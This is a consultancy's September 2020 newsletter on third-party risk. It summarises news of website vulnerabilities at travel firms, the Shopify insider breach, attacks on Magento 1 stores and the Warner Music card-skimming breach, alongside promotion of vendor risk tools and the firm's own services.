Third Party Risk Management - Consultancy, Assessment & Advisory

Third Party Risk Insights Sept 2020

This Month's Key Third Party Risk Management Articles & Reports

Hundreds of data security risks on Marriott, British Airways and easyJet websites exposed by Which?

A Which? investigation has exposed hundreds of security vulnerabilities on the websites of major airlines, tour operators and hotel chains. When cyber security experts checked the security of 98 travel firms they found Marriott, British Airways and easyJet were in the worst five companies with the most risks identified.

Experts found 497 vulnerabilities on Marriot owned websites alone. More than 100 of these were assessed to be ‘critical’ or ‘high’. Read more…

Gartner Names ProcessUnity a Leader in the 2020 Gartner Magic Quadrant for IT Vendor Risk Management Tools

Congratulations to our technology partner ProcessUnity on receiving two accolades from Gartner.

Gartner has named ProcessUnity a Leader in the 2020 Gartner Magic Quadrant for the 2nd consecutive year AND gave them the highest score for use case in the 2020 Gartner Critical Capabilities for IT Vendor Risk Management Tools. Learn more and Download the report

Shared Assessments releases the 2021 TPRM & Data Privacy Toolkit.

The 2021 TPRM Toolkit is an essential part of the Shared Assessments Third Party Risk Management framework, which helps organisations manage the full lifecycle of a third party relationship. The 2021 Toolkit was built to allow standardised excellence in content and to make assessments easier to create, customise, and manage.

Learn about the 2021 Toolkit and key updates.

You’re Only As Strong As Your Weakest Link

Third-Party breaches & Cyber Supply Chain issues that caught our eye

Learning lessons in enhancing IAM from the Shopify breach

Shopify’s announcement that two employees inappropriately accessed transactional data from 200 of the merchants that use its e-commerce platform demonstrates the importance of taking a “zero trust” approach to security and improving identity and access management capabilities, security experts say. Click to read the full article.

E-commerce site using Magento

Around 2000 e-commerce stores running the Magento program were targeted in August, compromising thousands of customer information. All of these stores were running an older version of Adobe’s Magento software, for which Adobe ended the support as of June 30. Magento is an open-source e-commerce platform written in PHP, which was acquired by Adobe in 2018. According to Sansec research, about 95,000 e-commerce sites still rely on the older version.

2020 has by far been the largest-scale of attacks towards e-commerce sites since 2015. For one store alone, tens of thousands of customers had their payment information compromised.

On a hacking forum, the user z3r0day posted the selling of a Magento 1 “remote code execution” exploit procedure for $5000, with a tutorial clip. Supposedly, no current Magento admin account is required. The user added “Magento 1 is end-of-life – no patches will be provided by Adobe to fix this bug,” which expands the exploit surface.

Adobe has urged customers to upgrade to the newer platform, which is Magento 2, also adding no further patches will be issued by Adobe for Magento 1.

Warner Music Group

In accordance with the above attack, Warner Music Group also released a data breach warning. The warning followed a sustained skimming attack on a various number of its e-commerce websites.

The web skimming attack was discovered by the WMS Security Team in the beginning of August. The team in charge believed the breach window was between April 25 and August 5, 2020.

Personal data compromised in the attack includes, names, email addresses, credit card numbers, card expiration dates and CVC and CVV codes. A data breach notice sent by Warner to the affected customers claims “any personal information” customers entered into the affected websites “after placing an item in your shopping cart was potentially acquired by the unauthorized third party.”

It is not clear whether the same exploit that z3r0day offered was leveraged in the attack.

Learn more about how DVV Solutions Third Party risk managed services can help you achieve operational resilience and enhance oversight in your cyber supply chain.

Call today 0161 476 8700

or Submit a Contact Form